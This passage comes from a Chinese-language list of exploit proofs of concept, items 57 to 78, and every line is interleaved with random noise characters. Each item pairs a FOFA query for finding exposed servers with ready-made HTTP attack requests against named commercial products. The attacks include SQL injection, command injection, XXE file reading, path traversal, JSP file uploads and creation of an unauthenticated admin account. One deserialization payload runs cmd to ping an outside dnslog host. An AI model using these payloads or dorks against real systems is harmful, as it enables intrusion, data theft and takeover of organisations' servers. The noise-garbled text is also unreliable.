& N' x: V4 W: z7 ]Host: x.x.x.x: _4 A& i9 ~) Z$ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ }% f& ?# B1 \) s0 U( l$ MContent-Type: application/json
! S" }1 y, A0 \% H+ V, a3 i
$ R9 P0 z* `4 @- N' d{# \8 ?+ s& h8 ?$ b/ |/ v
"storeID":{
Z, K5 k" H( T; Z/ J) ?! K9 E "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 E% ?/ z6 h6 R! V6 F U
"MethodName":"Start",
, a \/ e0 d [6 M$ W' U "ObjectInstance":{
+ v$ a" B1 Y2 F" W0 L6 F "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" \3 s0 m `7 I* k6 ], N& D/ c( a "StartInfo": {" O6 Z0 v/ n& y
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" M# |9 m! E7 e- T4 {) q "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw" Z4 N" M5 I# K5 T$ E
}
( O' G" S" u. g6 q/ R$ i# r }
! b5 n& ?% h6 r0 k9 } }: j" B$ I% n! G: K
}
( v. I- y- @: N: K5 [5 y3 I
d% }) X3 x" Y- D8 Y: d/ M a5 p6 }6 E
57. 畅捷通T+ keyEdit.aspx SQL注入1 F+ w: E/ s: K2 r) o+ ]& M& a
FOFA:app="畅捷通-TPlus"
+ b1 ]' s' V1 F2 a) GGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1. i l; F' L- Y
Host: host- m: c" V0 k7 F- p' C3 l. y
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! V6 [/ M4 [, _! `! W" }5 G1 P/ J" dAccept-Charset: utf-85 \, X7 k9 J2 g" _. `
Accept-Encoding: gzip, deflate1 ?2 r# R! B3 P, G) {; v1 p0 q/ r
Connection: close
/ X$ a3 ]9 t2 x% \, f1 [' ^. @8 ?$ B( P: g, j
* C. Q+ s n( {8 L7 ]- w
58. 畅捷通T+ KeyInfoList.aspx sql注入
# m* z7 V2 O% _* o1 l. O8 WFOFA:app="畅捷通-TPlus"7 R! n# G9 G6 v" s6 `9 Y ?7 g+ A
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.16 f( R0 h. C; C/ }7 p
Host: your-ip; s9 U R8 D7 `3 \0 i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 e& J) r! |# S/ V
Accept-Charset: utf-8/ x# }9 H3 h* ^( a1 ]
Accept-Encoding: gzip, deflate) s, ?; a- u$ H5 \2 n
Connection: close' V" ^' U7 a% ^8 `
# ~0 I9 T! H+ Z* x. ?' d7 [
7 g( m* b, M2 a59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行- T9 R5 g# x- Z- Z1 _7 T3 _* d: w, L
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
1 c" j, _+ a" V9 d) SPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
7 b) U- v, A- n3 L2 O. {1 f+ @Host: 192.168.86.128:9090
* J* o0 a1 u' d7 cUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
v. z; A/ B$ d8 P, UConnection: close" `" ]+ Y1 l8 @* o& J& w' B
Content-Length: 1669
r- K' N/ w# n" i9 PAccept: */*4 ~ `" ~; z6 h" g" C
Accept-Language: en: D6 L7 I t# h5 Q& u) m; {
Content-Type: application/x-www-form-urlencoded
) L' N. S% M6 I4 tAccept-Encoding: gzip: g- D+ @; s* M9 g$ ?
6 h; v, o5 w6 {
PAYLOAD. ] F( W0 v7 z4 W
\$ n0 v! R& t! g- E+ L% {$ w: d$ [4 b; i6 H3 |6 K4 c
60. 百卓Smart管理平台 importexport.php SQL注入! y! u" I0 e2 `& T# c# o4 }
FOFA:title="Smart管理平台"5 C) ]& Y8 w7 ?) B% J6 D
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
9 o3 R, d6 S- X Z8 P7 Q" CHost:
& x8 p! ^3 w( X% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ V2 i5 m: {4 V& H" o* O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" `' g9 j9 o M) t1 f/ x5 {& j
Accept-Encoding: gzip, deflate
+ ~1 M P3 M5 [1 f# n( K( W1 pAccept-Language: zh-CN,zh;q=0.9' f, ~" B4 f: c
Connection: close7 F& i" H7 C1 T/ v
) m2 s+ V( w* x- q0 Y0 p. ^8 }
6 z$ d v% C; B, p) g5 E61. 浙大恩特客户资源管理系统 fileupload 任意文件上传3 V2 L5 `! I& Q/ H+ ?; d$ X
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
2 U [! w! |$ HPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.14 f. G8 r" @0 [3 s0 |: b
Host: x.x.x.x
: g' _1 J( S2 G, X' tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 _; `, I7 c+ ?& K8 w2 O9 p4 uConnection: close
, K8 y1 }% D% K/ fContent-Length: 27
9 b4 |! Q5 R6 g6 tAccept: */*, z" Z' p' n2 a: w$ p" Y
Accept-Encoding: gzip, deflate
; j& l! X5 G& _Accept-Language: en
+ D% L" ?! o# `: \. h) w7 W' qContent-Type: application/x-www-form-urlencoded( P8 m4 L0 |/ m
5 Y/ b/ X* }3 R) i
8uxssX66eqrqtKObcVa0kid98xa( `) |6 G# P5 `3 E Z3 c4 Z6 [
& U$ l* N5 G. |
5 p5 @' ]6 H& M5 g62. IP-guard WebServer 远程命令执行
5 }" R4 a- d. H4 s D( @; FFOFA:"IP-guard" && icon_hash="2030860561"2 K0 X, e9 X! q# i. x
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.18 `7 m) H/ [1 E' d4 k# b
Host: x.x.x.x, b. G1 U. W# l: |5 U! n
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 C/ ^/ j" J8 o! M. uConnection: close5 h$ F# q4 q( H3 {; J
Accept: */*
! D3 i. v7 h# H, K$ HAccept-Language: en2 p p. G9 a8 W& ~5 s, W
Accept-Encoding: gzip
2 K; h5 D, Q& Q4 D: q! t* ~$ a3 Y0 h% z! u# y
' b, k, |/ G- t% G3 B: {) \3 R) v* o
访问" P1 y$ J& x- s5 P- C5 F4 Y
. z" ^7 J6 i$ Q: U/ s) l) D: nGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 [. h' h: h# Y$ c0 b# x8 n( ]
Host: x.x.x.x: x" Z1 p# K D# v" h' Z" S: e N
6 e/ g' I( q* D
: ~) v( ? v. m- P3 S S' [1 h63. IP-guard WebServer任意文件读取
6 K) W; P' V' A* X0 ?; \IP-guard < 4.82.0609.09 u# C( s' D. K/ h# M' U8 g2 k9 g
FOFA:icon_hash="2030860561"
& F7 D, D W7 L0 K% J8 J+ aPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
1 K Y$ |, i, `- y( R$ h1 i/ AHost: your-ip
1 G9 Z' p- q: e6 I' L; i k1 {4 O7 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 L3 E9 _" n X# i. {3 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. `- g- `& x- y+ k8 ]) ]( vAccept-Encoding: gzip, deflate
T `& J6 m+ L+ i& f& Y& TAccept-Language: zh-CN,zh;q=0.9
0 W8 P! F! ?- Y9 h2 EConnection: close- X5 `7 ]: \" G1 a' i
Content-Type: application/x-www-form-urlencoded
- u7 q0 A3 m$ Z# g) f+ v# S' W0 N
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
9 I3 R1 h5 j+ c* Y
, X( d6 w9 w; h) M- V& ^6 d# W. h64. 捷诚管理信息系统CWSFinanceCommon SQL注入- V! r. [+ ?4 D r& Y( S+ L
FOFA:body="/Scripts/EnjoyMsg.js"
' h( \5 v& X5 ?POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
6 `6 {- i5 I3 G3 F+ B a# |Host: 192.168.86.128:9001
" Z0 S7 U; _7 E* mUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36* Q p9 q) p: x
Connection: close, b; x" r% V1 e8 a: b' j
Content-Length: 369
9 H& C, l; X& Y! p% F# x2 X2 MAccept: */*
, w' i6 E1 G" T/ YAccept-Language: en: f' f* k Q, D( F. D6 j
Content-Type: text/xml; charset=utf-8
* |& I! P6 e2 jAccept-Encoding: gzip
( \# K6 Z/ g N( \) i, C# ?0 s v9 P/ \6 Y$ h
<?xml version="1.0" encoding="utf-8"?>* E' ^* ^) x* ~; V; }7 M; O
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- T! t+ y* B! y6 N% i* w4 O
<soap:Body># z* q. W8 v! k H/ C$ P
<GetOSpById xmlns="http://tempuri.org/">/ M9 h7 o- `1 b' X5 b
<sId>1';waitfor delay '0:0:5'--+</sId>
3 |9 b2 P% H4 P% z1 C. W, _* |# n </GetOSpById>( _, d' }+ |& Y% T" D- `, N
</soap:Body>
& ^* `+ z" f- v2 l; E1 ^</soap:Envelope>
; h3 X5 j& o* k+ l3 X) C& P
6 g/ }; S+ t* O, E. C& R! m2 L& x
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
( T! Z' ?* A% r# Y' m( q& K2 @FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
/ [% [0 }& q. D5 k: U响应200即成功创建账号test123456/123456
/ k; S7 j# s; U4 w9 p5 l' uPOST /SystemMng.ashx HTTP/1.1! c# k7 |1 Q. C, `' O2 j
Host:
F6 d9 P0 O& M+ F0 [. GUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)! z( r7 t; u! R+ E( O
Accept-Encoding: gzip, deflate3 }9 H' U5 R' ~1 c* w4 N4 }: S: D. Y
Accept: */*/ {8 Z- a; G5 M' z
Connection: close3 e+ T; _" m6 }* Q a
Accept-Language: en e' E5 c# S: `8 q! e
Content-Length: 174
% \+ j) T- |4 W# v, `7 w. @; e' `. _% |* i3 j1 W
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators7 H J4 p& o+ U8 m3 |
) h. h8 M* c% }
: B; f8 o* i- @* ^/ ^
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入9 Q8 q1 u% L1 Z, B% `3 D7 {' [; w
FOFA:app="万户ezOFFICE协同管理平台"
1 }1 u V9 o- y# M( r3 g& V& y3 l+ D( ~
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
" W! D( {" v8 e# p% }Host: x.x.x.x
# U$ t" e7 ~$ Q) o3 q" m' qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) X( b: Q% X$ g$ a
Connection: close
: j& {$ ~% z7 T& X! @. KAccept: */*$ @+ c" ^$ u! S# o
Accept-Language: en
% {" B, \4 w- f0 s SAccept-Encoding: gzip
* P" n% i) C8 f, U4 y' Q
3 ] K* y$ E' }- Y+ E0 k8 h! _8 X3 \* s, d
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在5 Z# `2 {0 V: D: G
8 Y1 @" Q2 j: D A
67. 万户ezOFFICE wpsservlet任意文件上传& E4 a/ n4 p4 A) Q$ {" m- B$ p4 E& E
FOFA:app="万户网络-ezOFFICE"
, c& _4 {" K4 w. D$ WnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型" U% L: @9 @, Q
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
; t' ^4 e* m1 H. D3 QHost: x.x.x.x( [4 D9 i W u& \. {5 j$ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
& w7 D3 s7 P8 Y5 x$ P xContent-Length: 173& D3 Y9 k1 f& @7 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, \% \ ^: E) j; v& B
Accept-Encoding: gzip, deflate v7 k& P0 s+ u$ Y; Z- L6 {
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3/ h5 ^' m6 C o0 H# R" H& i2 t
Connection: close
/ D& @ w5 D1 mContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp1 x7 y- y; `$ l8 g1 f: Y
DNT: 1
) O% v. m8 |2 ~8 D# {; ]0 C, DUpgrade-Insecure-Requests: 1
! c+ n9 ]! F. ]& |
0 U% `9 ^9 |6 }; U' S--ufuadpxathqvxfqnuyuqaozvseiueerp7 s. v% b0 Y& y
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
0 y0 E9 M. d& T" |& O+ N$ a4 g: E0 u% @- E# a, S9 y g
<% out.print("sasdfghjkj");%>1 a% p( a9 E8 |( W! A6 U7 B: Z
--ufuadpxathqvxfqnuyuqaozvseiueerp--
! w% e( H% V) T0 M; U7 L. d8 K: \5 k$ v2 E& `" I; ^
$ Z3 t* ?3 C" V- ?7 f8 g* w; `文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp+ E- m7 Y9 |- G. L/ @3 e& k
' J/ i B5 @: G" P
68. 万户ezOFFICE wf_printnum.jsp SQL注入* b8 g6 d6 [ G6 b
FOFA:app="万户ezOFFICE协同管理平台"3 }$ n: G9 U6 t- ^6 G6 o
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.14 J) c$ V4 H8 s4 K
Host: {{host}}; z- u C( j- g0 X7 v4 |* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.366 Y- I. r6 m) i2 ]) b
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% B2 l$ V0 t& ~
Accept-Encoding: gzip, deflate9 F% H2 I: J! I3 I6 p) T5 [7 T* m& r2 a
Accept-Language: zh-CN,zh;q=0.9/ K0 R: i6 t; w- F
Connection: close
. [# t4 n# Y* [6 f: t* Y
7 Q% D, r) ?* f8 Y- T `7 Q3 |
8 J! C6 z1 l& q) d1 B69. 万户 ezOFFICE contract_gd.jsp SQL注入* c% y' V Q2 [* J+ r U. w
FOFA:app="万户ezOFFICE协同管理平台"
) s' Z9 b+ |! K6 @. LGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
$ B% u5 C. p5 E. UHost: your-ip
& n0 e% \$ p# Y9 f8 X4 d& gUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- k# h4 {6 m0 RAccept-Encoding: gzip, deflate- n! \: r, d" z2 x7 s2 o
Accept: */*9 X: [, o. o1 e! u; p9 Z" N
Connection: keep-alive
l/ H3 _( O1 w) g
" ?6 R3 N+ ~" p+ u5 r5 N: A; F R3 O
: J8 n6 K) ^: p6 W9 ]70. 万户ezEIP success 命令执行% u: ~; D5 i) w+ z( [9 ^
FOFA:app="万户网络-ezEIP"7 J5 V0 A8 O& o, H
POST /member/success.aspx HTTP/1.1
# p: n$ S& w6 Y# o$ | y/ S( C# W0 E2 jHost: {{Hostname}}
1 b" ]+ @* k% {3 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# G9 k/ ~# [5 x8 O3 oSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=# A" g5 e7 O( y, q
Content-Type: application/x-www-form-urlencoded( \; U% D, ?- ~% z/ ] [2 W8 f, A
TYPE: C( S) i Q3 |! C
Content-Length: 167023 O$ ]' X/ M$ K. }. s
$ ~( j W3 Q+ p2 ?__VIEWSTATE=PAYLOAD
6 ]/ z: @7 z y# M0 y' [) k! i" R( A4 P. ?( R8 f1 Y1 X
; N) V$ I' b, V8 ~1 P( Q1 o! i$ [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( X/ `$ w, I+ o' _FOFA:body="PM2项目管理系统BS版增强工具.zip"5 q% E6 I5 a o4 S$ H
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
8 V8 K# `0 P5 y, t# l) J3 c: i' j, THost: x.x.x.xx.x.x.x
- L/ n! @4 T$ W/ r6 GUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36* V) z3 v% _4 @3 F! J
Connection: close5 t$ l1 Q" W9 r9 N$ \: m2 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 v/ {2 t4 W7 ]) m
Accept-Encoding: gzip, deflate2 }6 S: n$ Q: t: x, @4 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( T( P3 _& c* _
Upgrade-Insecure-Requests: 13 Q% v7 i G; }% D! B4 B
0 v( x0 g+ q+ m0 Y
; R9 x# i0 G0 J8 y/ b72. 致远OA getAjaxDataServlet XXE& r/ A4 |- \1 _7 @$ r. Y; l s& k
FOFA:app="致远互联-OA"
! S0 h; o6 p9 ]( _POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
5 d7 d- o8 Z+ V5 J3 L ]9 k2 RHost: 192.168.40.131:80990 r/ ?+ X% Y; s t' j3 @# ]
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.367 G& M7 ~' ?# B; m) R( [) u# J
Connection: close& u" e# j. H5 ~5 T4 `5 D! Y
Content-Length: 583
; l/ J$ Q( l6 y" q8 \ K. oContent-Type: application/x-www-form-urlencoded5 R) e0 A3 H. o$ w' q
Accept-Encoding: gzip$ A. M( @9 c1 v, g0 Q6 Y2 a) P# ~: V
, ?% Y3 Q1 x% D6 v) R; m; LS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E* P" G7 {* f) s `1 v
, H- x& z# m% }7 t+ D7 K
7 x4 x2 d' b: c! e& J: Z
73. GeoServer wms远程代码执行
& k% r" o b' YFOFA:icon_hash=”97540678” F' R; s/ Q% q0 j" \' _1 x/ E$ Q2 |, t
POST /geoserver/wms HTTP/1.1
4 R! O3 {5 r/ [Host:
, f$ w2 b$ S AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ x5 Y# m/ p& m# ~. ~
Content-Length: 1981" s3 q% Y4 i3 p2 I2 ?
Accept-Encoding: gzip, deflate
5 a6 p; Y# D' SConnection: close
$ u" k( E: b6 ?3 {; z5 ^Content-Type: application/xml- I$ _0 Z/ `! ~, U
SL-CE-SUID: 3
7 x$ P3 l5 i- b- o$ U5 [) `. D9 b. u9 Y ^. Q+ Q" W- h
PAYLOAD, n1 z$ u( K+ t6 g8 A& ]
' [' ]# v0 l. }0 W- R+ }9 w" K
/ M5 z$ l6 @" n! ]5 W74. 致远M3-server 6_1sp1 反序列化RCE
' { d+ @+ U8 FFOFA:title="M3-Server". c. I8 b; y; E7 \
PAYLOAD
F: F8 I$ @( P2 |" \; y. V6 \0 y3 z) n* O$ e3 {
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
/ D3 w' G0 m( I5 ?: T/ K; m7 k uFOFA:app="TELESQUARE-TLR-2005KSH"; b; L7 Z9 O+ G: c( w7 d
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1$ B! C8 |, j$ ^* j% r
Host: x.x.x.x5 r$ X( O+ |" X/ x% l3 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 f3 x" P! s; N! a9 z7 ~' |9 {& C/ jConnection: close
5 e- w( w! y4 T6 LAccept: */*
6 a8 P5 t9 l0 j+ SAccept-Language: en& R. \: d- B6 ?& n
Accept-Encoding: gzip
$ U8 b2 k( Y' y5 ?' m1 S. p+ e' G1 x+ n" A2 Q5 M
2 Y0 r- B4 {# D" Z8 G; H- EGET /cgi-bin/test28256.txt HTTP/1.1- h) I, n) L$ J& f
Host: x.x.x.x
1 z) h; I" \0 H
0 p; w/ c) o' p/ {5 e/ b, y. m$ R5 |0 w' A) q
76. 新开普掌上校园服务管理平台service.action远程命令执行' L4 L7 ^ p5 t5 S5 B3 U
FOFA:title="掌上校园服务管理平台"
$ Z' ^! L) V7 l) oPOST /service_transport/service.action HTTP/1.1
; o6 e: l( r+ x2 E/ X: n9 ~' LHost: x.x.x.x$ j: i m0 c% |6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0' c: L/ i4 U5 Z$ j
Connection: close
- ]. `% J1 o' H# a" v% qContent-Length: 211
- G/ U. h2 Y* l; @/ G( ]7 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 r' C: g1 H( v. W5 AAccept-Encoding: gzip, deflate
+ Q! ~& G1 N3 L) I* H" O6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. l ?$ J; D+ |% jCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
- I1 t6 a& z O o. u. fUpgrade-Insecure-Requests: 1( o' e$ j( B& L# Z3 t5 s
, J$ W u" b; I' @" y- ], p& R{
/ f$ T. E/ f* g6 `. I7 \0 u* f3 V"command": "GetFZinfo",
/ E& N+ y- P b: d* Z "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
1 |8 c! I7 a' }" h; {4 X; n ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"$ H1 b& [6 Y4 B U
}% j; R* E& M; t# T3 s4 `
$ q- K4 I# Y' ]# V+ j
- d9 p. X* g9 N" z( `GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
# X3 K1 x: A9 C7 q# E0 H H/ e" ]Host: x.x.x.x
) L3 T" x; B" b
0 B7 N! M/ p' X$ ?1 E
. m2 @3 c# i) K: b! Q
! [( ?9 a$ u# ]77. F22服装管理软件系统UploadHandler.ashx任意文件上传! |/ \6 T ]8 h+ z
FOFA:body="F22WEB登陆"
) a0 \! i0 [) q, CPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1& u' B$ b# k1 q$ d
Host: x.x.x.x
9 A9 Z$ z# p; r3 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* c' a7 ]/ q1 L1 O( U
Connection: close9 L: V" y6 p7 Q% r* o, j4 G+ H
Content-Length: 433: ^( r, y5 y1 o }3 y. X4 Q
Accept: */*
) d) d [/ s5 SAccept-Encoding: gzip, deflate
" i( M0 X9 x( C9 ~6 |- j4 R" S% tAccept-Language: zh-CN,zh;q=0.9
d* B1 z! Q9 _ UContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
( }- b6 q \" Z. c! y4 e" L" w
$ Z' [& P" _2 A8 l------------398jnjVTTlDVXHlE7yYnfwBoix
5 {$ W( \. [' L7 X/ w; [* ~1 F: k: K; YContent-Disposition: form-data; name="folder"
$ z' {& {3 H& H' o
' |, K& X, q" ^/ p6 F/upload/udplog) z- D; L2 Q9 V7 m8 \% S
------------398jnjVTTlDVXHlE7yYnfwBoix
! n! f* c0 M; N9 o/ QContent-Disposition: form-data; name="Filedata"; filename="1.aspx"3 T+ O2 h: [% d& Z- Z2 w
Content-Type: application/octet-stream; a" e; `+ | B0 F3 I
/ J3 z2 f+ E1 s' Y
hello1234567
. t6 L5 {$ U5 I+ Q5 Z------------398jnjVTTlDVXHlE7yYnfwBoix
9 S- d- D3 L# F3 Q! \Content-Disposition: form-data; name="Upload"0 P& c5 T& q, Y8 a
0 Q/ ]7 p5 S7 O. `Submit Query
# d8 |6 p( K q! j+ E6 _------------398jnjVTTlDVXHlE7yYnfwBoix--
) O4 y, M1 X6 m& f1 f7 S: s
8 m" n1 }% a2 Y) M3 E0 _" o2 j+ ~4 w
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
, k/ y' E) a7 oFOFA:icon_hash="2001627082"9 @! S2 \* Z# V( a8 m
POST /Platform/System/FileUpload.ashx HTTP/1.12 S5 C( j5 }& i& a) ]7 p
Host: x.x.x.x
: ]4 A$ B3 M* P! j1 G2 Q% }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 f5 D% v, m) l: NConnection: close
! t% ^0 @0 D5 _7 v4 OContent-Length: 3365 s" ?% e0 A6 d6 m, a' {
Accept-Encoding: gzip( D5 F" O7 z1 Z! U
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
7 {$ p! g' O7 f! u# a# m6 C
. J( w/ f& A' b* N: |8 G' A------YsOxWxSvj1KyZow1PTsh98fdu6l
+ G$ @( ?* u6 u( V GContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"1 Q9 R/ U% [' m: G: C: ]
Content-Type: image/png0 K b; c- A0 i% ]% ~2 U3 i
! Z" ^- j1 S* @6 w$ o6 UYsOxWxSvj1KyZow1PTsh98fdu6l% s- [2 F1 W" m8 G% o% S$ P$ Y1 X
------YsOxWxSvj1KyZow1PTsh98fdu6l( u6 W: W' H; u3 t3 C/ m6 J( }
Content-Disposition: form-data; name="target"
6 p& |; G8 J* I4 }( i! @$ g& \4 `, s3 L. D' J! s# A1 {
/Applications/SkillDevelopAndEHS/2 I3 i. p' y- D- M+ J, B
